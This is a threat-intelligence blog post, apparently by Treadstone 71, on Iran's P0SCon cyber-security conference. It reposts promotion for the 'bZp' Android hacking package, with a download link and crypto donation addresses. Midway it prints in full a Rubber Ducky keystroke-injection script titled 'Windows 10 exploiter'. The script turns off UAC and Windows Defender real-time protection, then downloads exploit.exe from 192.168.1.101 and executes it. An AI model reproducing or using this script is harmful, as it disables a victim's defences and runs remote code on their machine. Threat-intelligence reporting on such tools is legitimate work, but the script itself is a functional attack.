P0SCon gets rolling #bzp

Read Time:1 Minute, 34 Second
دومین نشست بین المللی امنیت سایبری #Urmia #Iran P0SCon# – شنبه ۲۰

مهر۹۸ – ایوند

Tagizadeh

cryber crime darknet

POSCon registration

https://github.com/Sir-MmD/bZp

bZp – ARM64

This package can be installed on every ARM64 Android devices!

Specifications:

Architecture: aarch64/arm64 (64bit)
Chroot OS: Ubuntu 18.04 LTS (Bionic Beaver)
Desktop: xfce4
Desktop theme: Flat Remix GTK
Desktop Icon: Flat Remix
Space Requirement: 8GB

Tip:

– This packages does not have any custom kernel! which means you can not use bZp-Kernel features such as wireless attack, bluetooth attacks, HID attack and…

Download bZp ARM64
http://bit.ly/2UqZ1hC

Known bugs:
– NONE

Warning: this package is only for ARM64 Devices

DONATE

BTC:
15eXiLtR3QaBepvn1GJ5mZCC5eVbHNsDJU

ETH:
0x37bd492B7073f0ff93Bb0f12BF76b90A98c97C73

RIAL:
https://idpay.ir/bzp-donate

REM
REM Windows 10 exploiter
REM Author: Sir.MmD
REM t.me/black_ZERO_project
REM
REM Disabling “UAC”…
GUI r
DELAY 100
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 100
REM Done
REM
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
ENTER
DELAY 500
REM Disabling “Windows Defender”…
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 500
REM Done
REM
REM Downloading exploit…
STRING cd C:\
ENTER
STRING $WebClient = New-Object System.Net.WebClient
ENTER
STRING $WebClient.DownloadFile(“http://192.168.1.101/exploit.exe”,”C:\exploit.exe”)
ENTER
DELAY 500
REM Done
REM
REM Executing exploit…
STRING ./exploit.exe
ENTER
DELAY 1000
ENTER
REM Done
STRING exit
ENTER
REM

https://github.com/Sir-MmD/bzp-android_kernel_samsung_universal8890-cm14.1

https://cybershafarat.com/vid_20191009_043550_873-mp4/ https://cybershafarat.com/vid_20191009_043442_197-mp4/

P0Scon 2018

About Post Author

Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %

Author

  • @Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence

Previous post Protests in Beirut
Next post Turkey starts the invasion against the Kurds
%d bloggers like this: